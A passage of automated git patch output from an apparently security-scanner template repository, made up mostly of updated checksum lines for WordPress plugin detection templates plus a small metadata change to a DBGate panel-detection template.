-http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
-http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
-http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
-http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
-http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
-http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
-http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
-http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
-http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
-http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
-http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
-http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
-http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
-http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
-http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
-http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
-http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
-http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
+http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
+http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
+http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
+http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
+http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
+http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
+http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
+http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
+http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
+http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
+http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
+http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
+http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
+http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
+http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
+http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
+http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
+http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
+http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
+http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
+http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
+http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
+http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
+http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
+http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
+http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
+http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
+http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
+http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
+http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
+http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
-http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
-http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
-http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
-http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
-http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
-http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
-http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
-http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
-http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
-http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
-http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf
-http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
+http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
+http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
+http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
+http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
+http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
+http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
+http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
+http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
+http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
+http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
+http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
+http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
-http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
+http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
+http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
-http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
-http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
-http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
-http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
-http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
+http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
+http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
+http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
+http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
+http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
-http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
-http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
-http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
-http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
-http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
-http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
+http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
+http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
+http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
+http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
+http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
+http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
+http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
-http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
-http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
-http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
-http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
-http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
-http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
-http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
-http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
+http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
+http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
+http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
+http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
+http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
+http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
+http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
+http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
+http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
-http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
-http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
-http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
-http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
-http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
+http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
+http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
+http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
+http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
+http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -6320,6 +6321,7 @@ http/vulnerabilities/cisco/cucm-username-enumeration.yaml:243ce2fe32405c9d5cbd69
 http/vulnerabilities/code42/code42-log4j-rce.yaml:810967e30a4b0e211a5f52519818bb3fa37c5af8
 http/vulnerabilities/concrete/concrete-xss.yaml:5c74a4c209709ab941b1df34e00672aa4d624edb
 http/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml:94e59ce09c6f7a5b757bcb275f9fba3b4f350441
+http/vulnerabilities/dbgate-unauth-rce.yaml:915edb3593e8e77410601c9cf8a3e691972824ad
 http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml:620f9d28007c42f54ed76141e370e5158d667055
 http/vulnerabilities/dedecms/dedecms-config-xss.yaml:16b7ffa61db6c0e6b550a9fdf0bf385085005d7f
 http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml:079f7c526b753b2eff94ca66ba8a8b4571dc2682
@@ -7074,7 +7076,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:b2b0b84f23893b3d3e7c9b80a8d2da7551d89dd5
+templates-checksum.txt:c53726cb5d97073863591694b689507b9cdc7663
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 4ba27d8b1c33f9de8bdbdd80995133ea385d51d8 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 17 Sep 2023 16:50:52 +0000
Subject: [PATCH 0413/1090] TemplateMan Update [Sun Sep 17 16:50:52 UTC 2023]
 :robot:

---
 http/exposed-panels/dbgate-panel.yaml       | 1 +
 http/vulnerabilities/dbgate-unauth-rce.yaml | 1 +
 2 files changed, 2 insertions(+)

diff --git a/http/exposed-panels/dbgate-panel.yaml b/http/exposed-panels/dbgate-panel.yaml
index d830eac6f8..7c4fd6d1e7 100644
--- a/http/exposed-panels/dbgate-panel.yaml
+++ b/http/exposed-panels/dbgate-panel.yaml
@@ -11,6 +11,7 @@ info:
   classification:
     cwe-id: CWE-200
   metadata:
+    max-request: 1
     shodan-query: http.favicon.hash:1198579728
   tags: panel,dbgate,oss
 
diff --git a/http/vulnerabilities/dbgate-unauth-rce.yaml b/http/vulnerabilities/dbgate-unauth-rce.yaml
index 476624c8ed..352d5e8560 100644
--- a/http/vulnerabilities/dbgate-unauth-rce.yaml
